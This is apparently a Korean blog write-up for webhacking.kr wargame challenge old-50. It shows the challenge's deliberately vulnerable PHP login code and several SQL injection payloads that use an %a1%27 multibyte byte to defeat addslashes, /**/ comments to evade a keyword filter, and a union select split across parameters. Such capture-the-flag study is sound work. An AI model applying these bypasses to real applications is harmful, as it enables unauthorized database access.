반응형
문제
<?php
include "../../config.php";
if($_GET['view_source']) view_source();
?><html>
<head>
<title>Challenge 50</title>
</head>
<body>
<h1>SQL INJECTION</h1>
<form method=get>
id : <input name=id value='guest'><br>
pw : <input name=pw value='guest'><br>
<input type=submit> <input type=reset>
</form>
<?php
if($_GET['id'] && $_GET['pw']){
$db = dbconnect();
$_GET['id'] = addslashes($_GET['id']);
$_GET['pw'] = addslashes($_GET['pw']);
$_GET['id'] = mb_convert_encoding($_GET['id'],'utf-8','euc-kr');
foreach($_GET as $ck) if(preg_match("/from|pw|\(|\)| |%|=|>|</i",$ck)) exit();
if(preg_match("/union/i",$_GET['id'])) exit();
$result = mysqli_fetch_array(mysqli_query($db,"select lv from chall50 where id='{$_GET['id']}' and pw=md5('{$_GET['pw']}')"));
if($result){
if($result['lv']==1) echo("level : 1<br><br>");
if($result['lv']==2) echo("level : 2<br><br>");
}
if($result['lv']=="3") solve(50);
if(!$result) echo("Wrong");
}
?>
<hr><a href=./?view_source=1>view-source</a>
</body>
</html>
lv="3"인 값을 찾으면 문제가 해결된다.
문제풀이
mb_convert_encoding() 함수를 활용하는 문제이다.
2023.01.03 - [wargame/web] - [Webhacking.kr] old-45
[Webhacking.kr] old-45
문제 SQL INJECTION id : pw : view-source
chandlerbong.tistory.com
select lv from chall50 where id='guest%a1%27%23' and pw=md5('guest')
위 구문으로 id=guest인 값을 확인하려고 했는데 '(%27)와 %a1가 결합하면 문자가 생기기 때문에 확인할 수 없다.
- lv=1
select lv from chall50 where id='%a1%27||lv/**/like/**/1%23' and pw=md5('guest')
- lv=3
select lv from chall50 where id='%a1%27||lv/**/like/**/3%23' and pw=md5('guest')
lv=3인 lv 값이 아닌 lv="3"을 확인해야 한다.
select lv from chall50 where id='%a1%27/*' and pw=md5('*/union/**/select/**/3%23')
반응형
'write-up(web) > webhacking.kr' 카테고리의 다른 글
| [Webhacking.kr] old-52 (0) | 2023.01.09 |
|---|---|
| [Webhacking.kr] old-51 (0) | 2023.01.05 |
| [Webhacking.kr] old-49 (0) | 2023.01.04 |
| [Webhacking.kr] old-48 (0) | 2023.01.04 |
| [Webhacking.kr] old-47 (0) | 2023.01.04 |